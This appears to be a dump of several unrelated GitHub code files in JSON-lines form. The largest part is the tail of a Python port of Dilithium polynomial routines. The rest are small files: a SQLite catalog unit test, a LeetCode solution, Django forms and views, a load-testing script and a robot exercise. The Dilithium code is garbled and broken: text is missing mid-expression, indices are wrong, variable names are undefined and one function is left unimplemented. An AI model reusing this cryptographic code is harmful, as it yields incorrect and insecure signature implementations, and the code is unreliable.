polynomial,\r\n* compute c0, c1 such that c mod Q = c1*2^D + c0\r\n* with -2^{D-1} < c0 <= 2^{D-1}. Assumes coefficients to be\r\n* standard representatives.\r\n*\r\n* Arguments: - poly *a1: pointer to output polynomial with coefficients c1\r\n* - poly *a0: pointer to output polynomial with coefficients c0\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_power2round(poly_a1,poly_a0,poly_a):\r\n for i in range(N):\r\n poly_a1.coeffs[i] = power2round(poly_a0.coeffs[i], poly_a.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_decompose\r\n*\r\n* Description: For all coefficients c of the input polynomial,\r\n* compute high and low bits c0, c1 such c mod Q = c1*ALPHA + c0\r\n* with -ALPHA/2 < c0 <= ALPHA/2 except c1 = (Q-1)/ALPHA where we\r\n* set c1 = 0 and -ALPHA/2 <= c0 = c mod Q - Q < 0.\r\n* Assumes coefficients to be standard representatives.\r\n*\r\n* Arguments: - poly *a1: pointer to output polynomial with coefficients c1\r\n* - poly *a0: pointer to output polynomial with coefficients c0\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\" \r\n \r\ndef poly_decompose(poly_a1,poly_a0,poly_a):\r\n for i in range(N):\r\n poly_a1.coeffs[i] = decompose(poly_a0.coeffs[i], poly_a.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_make_hint\r\n*\r\n* Description: Compute hint polynomial. The coefficients of which indicate\r\n* whether the low bits of the corresponding coefficient of\r\n* the input polynomial overflow into the high bits.\r\n*\r\n* Arguments: - poly *h: pointer to output hint polynomial\r\n* - const poly *a0: pointer to low part of input polynomial\r\n* - const poly *a1: pointer to high part of input polynomial\r\n*\r\n* Returns number of 1 bits.\r\n**************************************************/\"\"\"\r\n \r\ndef poly_make_hint(poly_h,poly_a0, poly_a1):\r\n for i in range(N):\r\n poly_h.coeffs[i] = make_hint(poly_a0.coeffs[i], poly_a1.coeffs[i])\r\n s += poly_h.coeffs[i]\r\n return s\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_use_hint\r\n*\r\n* Description: Use hint polynomial to correct the high bits of a polynomial.\r\n*\r\n* Arguments: - poly *b: pointer to output polynomial with corrected high bits\r\n* - const poly *a: pointer to input polynomial\r\n* - const poly *h: pointer to input hint polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_use_hint(poly_b,poly_a,poly_h):\r\n for i in range(N):\r\n poly_b.coeffs[i] = use_hint(poly_a.coeffs[i], poly_h.coeffs[i])\r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_chknorm\r\n*\r\n* Description: Check infinity norm of polynomial against given bound.\r\n* Assumes input coefficients were reduced by reduce32().\r\n*\r\n* Arguments: - const poly *a: pointer to polynomial\r\n* - int32_t B: norm bound\r\n*\r\n* Returns 0 if norm is strictly smaller than B <= (Q-1)/8 and 1 otherwise.\r\n**************************************************/\"\"\"\r\n \r\ndef poly_chknorm(poly_a,B):\r\n \r\n if(B> (Q-1)/8):\r\n return 1\r\n \r\n for i in range (N):\r\n t = poly_a.coeffs[i] >> 31\r\n t = poly_a.coeffs[i] - (t & 2*poly_a.coeffs[i])\r\n \r\n if(t >=B):\r\n return 1\r\n \r\n \r\n return 0\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: rej_uniform\r\n*\r\n* Description: Sample uniformly random coefficients in [0, Q-1] by\r\n* performing rejection sampling on array of random bytes.\r\n*\r\n* Arguments: - int32_t *a: pointer to output array (allocated)\r\n* - unsigned int len: number of coefficients to be sampled\r\n* - const uint8_t *buf: array of random bytes\r\n* - unsigned int buflen: length of array of random bytes\r\n*\r\n* Returns number of sampled coefficients. Can be smaller than len if not enough\r\n* random bytes were given.\r\n**************************************************/\"\"\"\r\n\r\ndef rej_uniform(a,leng, buf, buflen):\r\n \r\n ctr = pos = 0\r\n while(ctr < len and pos+3 <= buflen):\r\n pos+=1\r\n t = buf[pos]\r\n pos+=1\r\n t |= buf[pos] << 8\r\n pos+=1\r\n t |= buf[pos] << 16\r\n \r\n if (t < Q):\r\n ctr += 1\r\n a[ctr+1] = t\r\n \r\n return ctr\r\n\r\n\"\"\" /*************************************************\r\n* Name: poly_uniform\r\n*\r\n* Description: Sample polynomial with uniformly random coefficients\r\n* in [0,Q-1] by performing rejection sampling on the\r\n* output stream of SHAKE256(seed|nonce) or AES256CTR(seed,nonce).\r\n*\r\n* Arguments: - poly *a: pointer to output polynomial\r\n* - const uint8_t seed[]: byte array with seed of length SEEDBYTES\r\n* - uint16_t nonce: 2-byte nonce\r\n**************************************************/\"\"\"\r\nSTREAM128_BLOCKBYTES = SHAKE128_RATE\r\nPOLY_UNIFORM_NBLOCKS = ((768 + STREAM128_BLOCKBYTES - 1)/STREAM128_BLOCKBYTES)\r\n\r\n# implementation required!!!\r\n\"\"\"def poly_uniform(poly_a,seed,nonce):\r\n buflen = POLY_UNIFORM_NBLOCKS*STREAM128_BLOCKBYTES\r\n bufarray= array.array('i',(0 for i in range(0,POLY_UNIFORM_NBLOCKS*STREAM128_BLOCKBYTES+2)))\r\n \r\n state = SHAKE128(seed,nonce)\r\n\"\"\" \r\n \r\n \r\n#-------\r\n\r\n\r\n \r\n\"\"\" /*************************************************\r\n* Name: rej_eta\r\n*\r\n* Description: Sample uniformly random coefficients in [-ETA, ETA] by\r\n* performing rejection sampling on array of random bytes.\r\n*\r\n* Arguments: - int32_t *a: pointer to output array (allocated)\r\n* - unsigned int len: number of coefficients to be sampled\r\n* - const uint8_t *buf: array of random bytes\r\n* - unsigned int buflen: length of array of random bytes\r\n*\r\n* Returns number of sampled coefficients. Can be smaller than len if not enough\r\n* random bytes were given.\r\n**************************************************/\"\"\"\r\n\r\n\r\ndef rej_eta(a,leng,buf,buflen):\r\n ctr = pos = 0\r\n while (ctr> 4\r\n if ETA==2:\r\n if(t0<15):\r\n t0 = t0- (205*t0 >> 10)*5\r\n if(t1<15 and ctr> 10)*5\r\n a[ctr+1] = 2-t1\r\n elif ETA==4:\r\n if t0<9:\r\n a[ctr+1] = 4-t0\r\n if t1<9 and ctri:\r\n pos+=1\r\n b = buf[pos]\r\n c.coeffs[i] = c.coeffs[b]\r\n c.coeffs[b] = 1 - 2*(signs&1)\r\n signs >>= 1\r\n i+=1\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyeta_pack\r\n*\r\n* Description: Bit-pack polynomial with coefficients in [-ETA,ETA].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYETA_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\n\r\ndef polyeta_pack(r, poly_a):\r\n \r\n if ETA == 2:\r\n for i in range (N/8):\r\n t[0] = ETA - a.coeffs[8*i+0]\r\n t[1] = ETA - a.coeffs[8*i+1]\r\n t[2] = ETA - a.coeffs[8*i+2]\r\n t[3] = ETA - a.coeffs[8*i+3]\r\n t[4] = ETA - a.coeffs[8*i+4]\r\n t[5] = ETA - a.coeffs[8*i+5]\r\n t[6] = ETA - a.coeffs[8*i+6]\r\n t[7] = ETA - a.coeffs[8*i+7]\r\n \r\n r[3*i+0] = (t[0] >> 0) | (t[1] << 3) | (t[2] << 6)\r\n r[3*i+1] = (t[2] >> 2) | (t[3] << 1) | (t[4] << 4) | (t[5] << 7)\r\n r[3*i+2] = (t[5] >> 1) | (t[6] << 2) | (t[7] << 5)\r\n\r\n elif ETA == 4:\r\n for i in range (N/2):\r\n t[0] = ETA - a.coeffs[2*i+0]\r\n t[1] = ETA - a.coeffs[2*i+1]\r\n r[i] = t[0] | (t[1] << 4)\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyeta_unpack\r\n*\r\n* Description: Unpack polynomial with coefficients in [-ETA,ETA].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyeta_unpack(poly_r, a):\r\n \r\n if ETA == 2:\r\n for i in range (N/8): \r\n r.coeffs[8*i+0] = (a[3*i+0] >> 0) & 7\r\n r.coeffs[8*i+1] = (a[3*i+0] >> 3) & 7\r\n r.coeffs[8*i+2] = ((a[3*i+0] >> 6) | (a[3*i+1] << 2)) & 7\r\n r.coeffs[8*i+3] = (a[3*i+1] >> 1) & 7\r\n r.coeffs[8*i+4] = (a[3*i+1] >> 4) & 7\r\n r.coeffs[8*i+5] = ((a[3*i+1] >> 7) | (a[3*i+2] << 1)) & 7\r\n r.coeffs[8*i+6] = (a[3*i+2] >> 2) & 7\r\n r.coeffs[8*i+7] = (a[3*i+2] >> 5) & 7\r\n\r\n r.coeffs[8*i+0] = ETA - r.coeffs[8*i+0]\r\n r.coeffs[8*i+1] = ETA - r.coeffs[8*i+1]\r\n r.coeffs[8*i+2] = ETA - r.coeffs[8*i+2]\r\n r.coeffs[8*i+3] = ETA - r.coeffs[8*i+3]\r\n r.coeffs[8*i+4] = ETA - r.coeffs[8*i+4]\r\n r.coeffs[8*i+5] = ETA - r.coeffs[8*i+5]\r\n r.coeffs[8*i+6] = ETA - r.coeffs[8*i+6]\r\n r.coeffs[8*i+7] = ETA - r.coeffs[8*i+7]\r\n \r\n \r\n elif ETA == 4:\r\n for i in range (N/2):\r\n r.coeffs[2*i+0] = a[1] & 0x0F\r\n r.coeffs[2*i+1] = a[i] >> 4\r\n r.coeffs[2*i] = ETA - r.coeffs[2*i]\r\n r.coeffs[2*i+1] = ETA - r.coeffs[2*i+1]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyt1_pack\r\n*\r\n* Description: Bit-pack polynomial t1 with coefficients fitting in 10 bits.\r\n* Input coefficients are assumed to be standard representatives.\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYT1_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\n \r\ndef polyt1_pack(r,poly_a):\r\n \r\n for i in range (N/4):\r\n r[5*i+0] = (a.coeffs[4*i+0] >> 0)\r\n r[5*i+1] = (a.coeffs[4*i+0] >> 8) | (a.coeffs[4*i+1] << 2)\r\n r[5*i+2] = (a.coeffs[4*i+1] >> 6) | (a.coeffs[4*i+2] << 4)\r\n r[5*i+3] = (a.coeffs[4*i+2] >> 4) | (a.coeffs[4*i+3] << 6)\r\n r[5*i+4] = (a.coeffs[4*i+3] >> 2)\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyt1_unpack\r\n*\r\n* Description: Unpack polynomial t1 with 10-bit coefficients.\r\n* Output coefficients are standard representatives.\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyt1_unpack(poly_r, a):\r\n \r\n for i in range (N/4):\r\n r.coeffs[4*i+0] = ((a[5*i+0] >> 0) | (a[5*i+1] << 8)) & 0x3FF\r\n r.coeffs[4*i+1] = ((a[5*i+1] >> 2) | (a[5*i+2] << 6)) & 0x3FF\r\n r.coeffs[4*i+2] = ((a[5*i+2] >> 4) | (a[5*i+3] << 4)) & 0x3FF\r\n r.coeffs[4*i+3] = ((a[5*i+3] >> 6) | (a[5*i+4] << 2)) & 0x3FF\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: polyt0_pack\r\n*\r\n* Description: Bit-pack polynomial t0 with coefficients in ]-2^{D-1}, 2^{D-1}].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYT0_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\ndef polyt0_pack(r,poly_a):\r\n \r\n for i in range (N/8):\r\n t[0] = (1 << (D-1)) - a.coeffs[8*i+0]\r\n t[1] = (1 << (D-1)) - a.coeffs[8*i+1]\r\n t[2] = (1 << (D-1)) - a.coeffs[8*i+2]\r\n t[3] = (1 << (D-1)) - a.coeffs[8*i+3]\r\n t[4] = (1 << (D-1)) - a.coeffs[8*i+4]\r\n t[5] = (1 << (D-1)) - a.coeffs[8*i+5]\r\n t[6] = (1 << (D-1)) - a.coeffs[8*i+6]\r\n t[7] = (1 << (D-1)) - a.coeffs[8*i+7]\r\n \r\n r[13*i+ 0] = t[0]\r\n r[13*i+ 1] = t[0] >> 8\r\n r[13*i+ 1] |= t[1] << 5\r\n r[13*i+ 2] = t[1] >> 3\r\n r[13*i+ 3] = t[1] >> 11\r\n r[13*i+ 3] |= t[2] << 2\r\n r[13*i+ 4] = t[2] >> 6\r\n r[13*i+ 4] |= t[3] << 7\r\n r[13*i+ 5] = t[3] >> 1\r\n r[13*i+ 6] = t[3] >> 9\r\n r[13*i+ 6] |= t[4] << 4\r\n r[13*i+ 7] = t[4] >> 4\r\n r[13*i+ 8] = t[4] >> 12\r\n r[13*i+ 8] |= t[5] << 1\r\n r[13*i+ 9] = t[5] >> 7\r\n r[13*i+ 9] |= t[6] << 6\r\n r[13*i+10] = t[6] >> 2\r\n r[13*i+11] = t[6] >> 10\r\n r[13*i+11] |= t[7] << 3\r\n r[13*i+12] = t[7] >> 5\r\n\r\n\"\"\" /*************************************************\r\n* Name: polyt0_unpack\r\n*\r\n* Description: Unpack polynomial t0 with coefficients in ]-2^{D-1}, 2^{D-1}].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyt0_unpack(poly_r, a):\r\n for i in range (N/8):\r\n r.coeffs[8*i+0] = a[13*i+0]\r\n r.coeffs[8*i+0] |= a[13*i+1] << 8\r\n r.coeffs[8*i+0] &= 0x1FFF\r\n\r\n r.coeffs[8*i+1] = a[13*i+1] >> 5\r\n r.coeffs[8*i+1] |= a[13*i+2] << 3\r\n r.coeffs[8*i+1] |= a[13*i+3] << 11\r\n r.coeffs[8*i+1] &= 0x1FFF\r\n\r\n r.coeffs[8*i+2] = a[13*i+3] >> 2\r\n r.coeffs[8*i+2] |= a[13*i+4] << 6\r\n r.coeffs[8*i+2] &= 0x1FFF\r\n\r\n r.coeffs[8*i+3] = a[13*i+4] >> 7\r\n r.coeffs[8*i+3] |= a[13*i+5] << 1\r\n r.coeffs[8*i+3] |= a[13*i+6] << 9\r\n r.coeffs[8*i+3] &= 0x1FFF\r\n\r\n r.coeffs[8*i+4] = a[13*i+6] >> 4\r\n r.coeffs[8*i+4] |= a[13*i+7] << 4\r\n r.coeffs[8*i+4] |= a[13*i+8] << 12\r\n r.coeffs[8*i+4] &= 0x1FFF\r\n\r\n r.coeffs[8*i+5] = a[13*i+8] >> 1\r\n r.coeffs[8*i+5] |= a[13*i+9] << 7\r\n r.coeffs[8*i+5] &= 0x1FFF\r\n \r\n r.coeffs[8*i+6] = a[13*i+9] >> 6\r\n r.coeffs[8*i+6] |= a[13*i+10] << 2\r\n r.coeffs[8*i+6] |= a[13*i+11] << 10\r\n r.coeffs[8*i+6] &= 0x1FFF\r\n\r\n r.coeffs[8*i+7] = a[13*i+11] >> 3\r\n r.coeffs[8*i+7] |= a[13*i+12] << 5\r\n r.coeffs[8*i+7] &= 0x1FFF\r\n\r\n r.coeffs[8*i+0] = (1 << (D-1)) - r.coeffs[8*i+0]\r\n r.coeffs[8*i+1] = (1 << (D-1)) - r.coeffs[8*i+1]\r\n r.coeffs[8*i+2] = (1 << (D-1)) - r.coeffs[8*i+2]\r\n r.coeffs[8*i+3] = (1 << (D-1)) - r.coeffs[8*i+3]\r\n r.coeffs[8*i+4] = (1 << (D-1)) - r.coeffs[8*i+4]\r\n r.coeffs[8*i+5] = (1 << (D-1)) - r.coeffs[8*i+5]\r\n r.coeffs[8*i+6] = (1 << (D-1)) - r.coeffs[8*i+6]\r\n r.coeffs[8*i+7] = (1 << (D-1)) - r.coeffs[8*i+7]\r\n \r\n\r\n\"\"\" /*************************************************\r\n* Name: polyz_pack\r\n*\r\n* Description: Bit-pack polynomial with coefficients\r\n* in [-(GAMMA1 - 1), GAMMA1].\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYZ_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyz_pack(r, poly_a):\r\n \r\n if GAMMA1 == (1<<17):\r\n for i in range (N/4):\r\n t[0] = GAMMA1 - a.coeffs[4*i+0]\r\n t[1] = GAMMA1 - a.coeffs[4*i+1]\r\n t[2] = GAMMA1 - a.coeffs[4*i+2]\r\n t[3] = GAMMA1 - a.coeffs[4*i+3]\r\n \r\n r[9*i+0] = t[0]\r\n r[9*i+1] = t[0] >> 8\r\n r[9*i+2] = t[0] >> 16\r\n r[9*i+2] |= t[1] << 2\r\n r[9*i+3] = t[1] >> 6\r\n r[9*i+4] = t[1] >> 14\r\n r[9*i+4] |= t[2] << 4\r\n r[9*i+5] = t[2] >> 4\r\n r[9*i+6] = t[2] >> 12\r\n r[9*i+6] |= t[3] << 6\r\n r[9*i+7] = t[3] >> 2\r\n r[9*i+8] = t[3] >> 10 \r\n\r\n elif GAMMA1 == (1<<19):\r\n for i in range (N/2):\r\n t[0] = GAMMA1 - a.coeffs[2*i+0]\r\n t[1] = GAMMA1 - a.coeffs[2*i+1]\r\n \r\n r[5*i+0] = t[0]\r\n r[5*i+1] = t[0] >> 8\r\n r[5*i+2] = t[0] >> 16\r\n r[5*i+2] |= t[1] << 4\r\n r[5*i+3] = t[1] >> 4\r\n r[5*i+4] = t[1] >> 12\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: polyz_unpack\r\n*\r\n* Description: Unpack polynomial z with coefficients\r\n* in [-(GAMMA1 - 1), GAMMA1].\r\n*\r\n* Arguments: - poly *r: pointer to output polynomial\r\n* - const uint8_t *a: byte array with bit-packed polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyz_unpack(poly_r, a):\r\n \r\n if GAMMA1 == (1<<17):\r\n for i in range (N/4):\r\n r.coeffs[4*i+0] = a[9*i+0]\r\n r.coeffs[4*i+0] |= a[9*i+1] << 8\r\n r.coeffs[4*i+0] |= a[9*i+2] << 16\r\n r.coeffs[4*i+0] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+1] = a[9*i+2] >> 2\r\n r.coeffs[4*i+1] |= a[9*i+3] << 6\r\n r.coeffs[4*i+1] |= a[9*i+4] << 14\r\n r.coeffs[4*i+1] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+2] = a[9*i+4] >> 4\r\n r.coeffs[4*i+2] |= a[9*i+5] << 4\r\n r.coeffs[4*i+2] |= a[9*i+6] << 12\r\n r.coeffs[4*i+2] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+3] = a[9*i+6] >> 6\r\n r.coeffs[4*i+3] |= a[9*i+7] << 2\r\n r.coeffs[4*i+3] |= a[9*i+8] << 10\r\n r.coeffs[4*i+3] &= 0x3FFFF\r\n \r\n r.coeffs[4*i+0] = GAMMA1 - r.coeffs[4*i+0]\r\n r.coeffs[4*i+1] = GAMMA1 - r.coeffs[4*i+1]\r\n r.coeffs[4*i+2] = GAMMA1 - r.coeffs[4*i+2]\r\n r.coeffs[4*i+3] = GAMMA1 - r.coeffs[4*i+3]\r\n\r\n\r\n elif GAMMA1 == (1<<19):\r\n for i in range (N/2):\r\n r.coeffs[2*i+0] = a[5*i+0]\r\n r.coeffs[2*i+0] |= a[5*i+1] << 8\r\n r.coeffs[2*i+0] |= a[5*i+2] << 16\r\n r.coeffs[2*i+0] &= 0xFFFFF\r\n \r\n r.coeffs[2*i+1] = a[5*i+2] >> 4\r\n r.coeffs[2*i+1] |= a[5*i+3] << 4\r\n r.coeffs[2*i+1] |= a[5*i+4] << 12\r\n r.coeffs[2*i+0] &= 0xFFFFF\r\n \r\n r.coeffs[2*i+0] = GAMMA1 - r.coeffs[2*i+0]\r\n r.coeffs[2*i+1] = GAMMA1 - r.coeffs[2*i+1]\r\n\r\n\r\n\"\"\" /*************************************************\r\n* Name: polyw1_pack\r\n*\r\n* Description: Bit-pack polynomial w1 with coefficients in [0,15] or [0,43].\r\n* Input coefficients are assumed to be standard representatives.\r\n*\r\n* Arguments: - uint8_t *r: pointer to output byte array with at least\r\n* POLYW1_PACKEDBYTES bytes\r\n* - const poly *a: pointer to input polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef polyw1_pack(r,poly_a):\r\n if GAMMA2 == (Q-1)/88:\r\n for i in range (N/4):\r\n r[3*i+0] = a.coeffs[4*i+0]\r\n r[3*i+0] |= a.coeffs[4*i+1] << 6\r\n r[3*i+1] = a.coeffs[4*i+1] >> 2\r\n r[3*i+1] |= a.coeffs[4*i+2] << 4\r\n r[3*i+2] = a.coeffs[4*i+2] >> 4\r\n r[3*i+2] |= a.coeffs[4*i+3] << 2\r\n \r\n elif GAMMA2 == (Q-1)/32:\r\n for i in range (N/2):\r\n r[i] = a.coeffs[2*i+0] | (a.coeffs[2*i+1] << 4); \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bilgehanertan/PQC-Dilithium-Python-Implementation","sub_path":"Libraries/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":26596,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"1696228735","text":"\"\"\"SQLite Intake Catalog unit tests.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom pathlib import Path\n\nimport pytest\n\nfrom intake_sqlite import urlpath_to_sqliteurl\n\nlogger = logging.getLogger(__name__)\n\nDATA_DIR = Path(__file__).resolve().parents[1] / \"data\"\n\nBAD_FILES: list[tuple[str, type[Exception]]] = [\n (\"database.wtf\", ValueError),\n (\"dbdump.sql\", ValueError),\n (\"nonexistent.db\", ValueError),\n (\"nonexistent.sqlite\", ValueError),\n]\n\nBAD_URLS: list[tuple[str, type[Exception]]] = [\n (\"https://catalyst.coop/pudl.wtf\", ValueError),\n (\"s3://catalyst.coop/pudl.dude\", ValueError),\n (\"gs://catalyst.coop/pudl.sql\", ValueError),\n (\"wtftp://catalyst.coop/pudl.sqlite\", ValueError),\n (\"wtftp://catalyst.coop/pudl.db\", ValueError),\n]\n\n\n@pytest.mark.parametrize(\"filename,exc\", BAD_FILES)\ndef test_bad_filenames(filename: str, exc: type[Exception], tmp_path: Path) -> None:\n \"\"\"Test for failure on bad or non-existent files.\"\"\"\n urlpath = tmp_path / filename\n with pytest.raises(exc):\n urlpath_to_sqliteurl(str(urlpath))\n\n\n@pytest.mark.parametrize(\"dirname,exc\", BAD_FILES)\ndef test_bad_dirnames(dirname: str, exc: type[Exception], tmp_path: Path) -> None:\n \"\"\"Test for failure when path points to a directory, not a file.\"\"\"\n urlpath = tmp_path / dirname\n urlpath.mkdir()\n with pytest.raises(exc):\n urlpath_to_sqliteurl(str(urlpath))\n\n\n@pytest.mark.parametrize(\"url,exc\", BAD_URLS)\ndef test_bad_urls(url: str, exc: type[Exception]) -> None:\n \"\"\"Test for failure when we get a bad URL.\"\"\"\n with pytest.raises(exc):\n urlpath_to_sqliteurl(url)\n\n\ndef test_local_path_to_sqliteurl() -> None:\n \"\"\"Test our transformation of paths/URLs into SQL Alchemy URLs.\"\"\"\n expected_local_url = f\"sqlite:///{DATA_DIR / 'test.db'}\"\n test_db_path = DATA_DIR / \"test.db\"\n actual_local_url = urlpath_to_sqliteurl(str(test_db_path))\n assert actual_local_url == expected_local_url # nosec: B101\n\n\n# Note: There's no remote URL unit test for a working input to urlpath_to_sqliteurl()\n# because it's exercised in the integration tests, and there's no way to know what the\n# local path to the cached file will be since it uses a hash (of the URL?) as the\n# filename.\n","repo_name":"catalyst-cooperative/intake-sqlite","sub_path":"tests/unit/intake_sqlite_test.py","file_name":"intake_sqlite_test.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"24491498554","text":"#\n# @lc app=leetcode.cn id=557 lang=python3\n#\n# [557] 反转字符串中的单词 III\n#\n\n# @lc code=start\nclass Solution:\n def reverseWords(self, s: str) -> str:\n ans,t='',''\n for c in s:\n if c==' ':\n ans+=t+' '\n t=''\n else:\n t=c+t\n if t!='':\n ans+=t\n return ans\n# @lc code=end\n\n","repo_name":"zerubbabel/leetcode","sub_path":"557.反转字符串中的单词-iii.py","file_name":"557.反转字符串中的单词-iii.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32931559168","text":"from django.forms import Form, ModelForm\nfrom randomchampion.champdatabase.models import Champion, Role\nfrom django import forms\n\nclass ChampionForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Champion\n\nclass ChooseChampionForm(forms.Form):\n\tROLE_CHOICES = (\n\t\t('all','All'),\n\t\t('jungler','Jungler'),\n\t\t('top','Top'),\n\t\t('mid','Mid'),\n\t\t('marksman','Marksman'),\n\t\t('support','Support')\n\t\t)\n\n\trole = forms.MultipleChoiceField(widget = forms.CheckboxSelectMultiple, choices = ROLE_CHOICES)","repo_name":"charmelonlai/lolrandomizer","sub_path":"randomchampion/champdatabase/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35502930233","text":"from django.shortcuts import render\n\nfrom .models import about\nfrom .models import slider\nfrom .models import client\n\ndef home(request):\n aboutData=about.objects.all()[0]\n sliderData=slider.objects.all()\n clientData=client.objects.all()\n context={\n 'about':aboutData,\n 'slider':sliderData,\n 'client':clientData\n }\n return render(request,'index.html',context)\n\ndef aboutus(request):\n return render(request,'about.html')\n\n\n","repo_name":"sharif7761/django_blog_web","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72067628587","text":"import pandas as pd\nfrom multiprocessing import Process\nimport threading\nimport time\nimport matplotlib.pyplot as plt\nimport statistics\nimport os\nimport json\nimport subprocess as sub\nimport numpy as np\nimport io\nmeans=[]\nnames = ['social_graph_mongo_update_client', 'social_graph_redis_update_client', 'follow_server', 'follow_with_username_server', 'user_mmc_get_user_id_client','get_user_id_server','follow_client', 'wrk2_api_user_follow']\ndf = pd.DataFrame()\ndf['Names']=names\nprint(df)\n\ncommand = ['/home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/wrk -D exp -t 1 -c 1 -d 20 -L -s /home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/scripts/social-network/compose-post.lua http://localhost:8080/wrk2-api/post/compose -R 10','/home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/wrk -D exp -t 1 -c 1 -d 20 -L -s /home/ugrads/l/lweichel13/Work/repos/repos/socialNetwork/wrk2/scripts/social-network/compose-post.lua http://localhost:8080/wrk2-api/post/compose -R 10000']\nmean=[0,0]\nwhile(mean[1]>=mean[0]):\n for i in range(0, 2):\n latency=os.popen(command[i]).readlines()\n print(latency[4])\n x=latency[4].split()\n print(x)\n e2e=x[1]\n #e2e=e2e.split('u')\n #e2e=e2e.split('m')\n if 'u' in e2e:\n e2e=e2e.split('u')\n mean.append(float(e2e[0]))\n elif 'm' in e2e:\n e2e=e2e.split('m')\n mean.append(float(e2e[0])*1000)\n #mean.append(e2e[0])\n cpuvalues=pd.read_csv('cpuvals.csv')\n print(cpuvalues)\n#print(e2e[0])\n#print(opname)\n print(mean)\n currlargeall = cpuvalues.iloc[0]['CPU%']\n currlargeall=currlargeall.split('%')\n currlargeall=float(currlargeall[0])\n if(mean[1]>=mean[0]):\n print(\"More CPU needs to be allocated. The mean end to end latency is higher with more requests per second.\")\n #increase CPU allocation here of nginx container.\n #the reason that 80% is chosen here is because of prior data collection that shows nginx container using upwards of 74% of CPU.\n #os.popen(\"dzdo docker run socialnetwork_nginx-thrift_1 --cpus=\".8\" ubuntu /bin/bash\")\n else:\n print(\"With higher workload request, the mean latency is less than or equal. Therefore, more CPU does not need to be allocated.\")\n \n\n","repo_name":"ElizabethWeichel/microservices_capstone","sub_path":"403/whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74603886827","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task\ndef task_5_10():\n left=True\n\n fill_cell()\n while not wall_is_on_the_right():\n move_right()\n fill_cell()\n\n flag1= not wall_is_beneath()\n while flag1:\n move_down()\n fill_cell()\n flag2=True\n while flag2:\n if left:\n move_left()\n fill_cell()\n else:\n move_right()\n fill_cell()\n flag2=not (wall_is_on_the_right() or wall_is_on_the_left())\n left=wall_is_on_the_right()\n flag1 = not wall_is_beneath()\n\n if left:\n while not wall_is_on_the_left():\n move_left()\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"DedkovEA/lab_1","sub_path":"task_22.py","file_name":"task_22.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16389458031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated Tue May 17 09:16:05 CEST 2022\n\n@author: Andrea Hahmann, DTU Wind\n\"\"\"\n\nfrom calendar import calendar\nimport cftime\nimport xarray as xr \nfrom datetime 